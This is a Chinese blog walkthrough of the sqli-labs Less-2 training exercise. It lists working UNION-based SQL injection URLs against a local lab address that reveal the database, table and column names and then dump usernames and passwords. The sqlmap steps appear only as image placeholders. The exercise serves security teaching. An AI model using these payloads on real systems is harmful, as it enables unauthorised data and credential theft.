当前位置:网站首页>sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)

sqli_libsLess-2 GET - Error based - Intiger based (基于错误的GET整型注入)

2022-08-08 21:59:00 XLXLXL.

Less-2 GET - Error based - Intiger based (基于错误的GET整型注入)

1 hackbar注入

在这里插入图片描述
输入‘发现页面出错 此处应该有sql注入
在这里插入图片描述
在这里插入图片描述
通过比较可以得出此处是整型注入
在这里插入图片描述
在这里插入图片描述

然后进行union联合查询
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,database() --+

在这里插入图片描述
查出库的名称是security
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=’security‘ --+
在这里插入图片描述
对user表进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name = ‘users’–+

在这里插入图片描述
对username password进行处理
http://192.168.253.130/sqli-labs-master/Less-2/?id=-1 union select 1,2,group_concat(‘用户名:’,username,‘密码:’,password) from users --+

在这里插入图片描述
拿到数据 结束

2 .sqlmap使用

1在这里插入图片描述
在这里插入图片描述
2
在这里插入图片描述
在这里插入图片描述
3 在这里插入图片描述
在这里插入图片描述

4
在这里插入图片描述
在这里插入图片描述
5.
在这里插入图片描述
在这里插入图片描述
拿到数据 结束

原网站

版权声明
本文为[XLXLXL.]所创,转载请带上原文链接,感谢
https://blog.csdn.net/m0_63126769/article/details/121039657

边栏推荐

猜你喜欢

随机推荐